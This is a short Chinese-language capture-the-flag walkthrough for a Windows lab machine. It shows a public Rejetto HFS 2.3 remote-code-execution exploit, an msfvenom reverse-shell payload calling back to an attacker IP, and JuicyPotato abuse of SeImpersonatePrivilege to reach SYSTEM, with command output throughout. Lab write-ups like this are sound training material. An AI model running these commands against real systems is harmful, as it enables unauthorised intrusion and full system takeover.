靶场：The Hackers Labs
地址：https://thehackerslabs.com/espeto-malaqueno/
系统：windows
内容：SeImpersonatePrivilege提权

这个机器流程比较简单，这里简单记录下。
第一步，80端口运行了httpfileserver 2.3，查找漏洞利用工具，直接得到用户shell。

wget https://github.com/randallbanner/Rejetto-HTTP-File-Server-HFS-2.3.x---Remote-Command-Execution/raw/refs/heads/main/hfs-2-3-exploit.py

第二步，查看用户权限，具有SeImpersonatePrivilege。

PS C:\Users\hacker\Downloads> whoami /priv

INFORMACI?N DE PRIVILEGIOS
--------------------------

Nombre de privilegio          Descripci?n                                  Estado       
============================= ============================================ =============
SeChangeNotifyPrivilege       Omitir comprobaci?n de recorrido             Habilitada   
SeImpersonatePrivilege        Suplantar a un cliente tras la autenticaci?n Habilitada   
SeCreateGlobalPrivilege       Crear objetos globales                       Habilitada   
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Deshabilitado

利用JuciyPotato提权，网址https://github.com/ohpe/juicy-potato。
首先生成shell。

└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1234 -f exe > rev.exe

将JuciyPotato.exe和rev.exe都上传至靶机，提权命令为：

PS C:\Users\hacker\Downloads> .\JuicyPotato.exe -l 1337 -p rev.exe -t *  -c "{f3b4e234-7a68-4e43-b813-e4ba55a065f6}"
Testing {f3b4e234-7a68-4e43-b813-e4ba55a065f6} 1337
....
[+] authresult 0
{f3b4e234-7a68-4e43-b813-e4ba55a065f6};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

监听的端口得到root shell。

└─$ rlwrap nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.157] 49166
Microsoft Windows [Versin 6.3.9600]
(c) 2013 Microsoft Corporation. Todos los derechos reservados.

C:\Windows\system32>whoami 
whoami 
nt authority\system

C:\Windows\system32>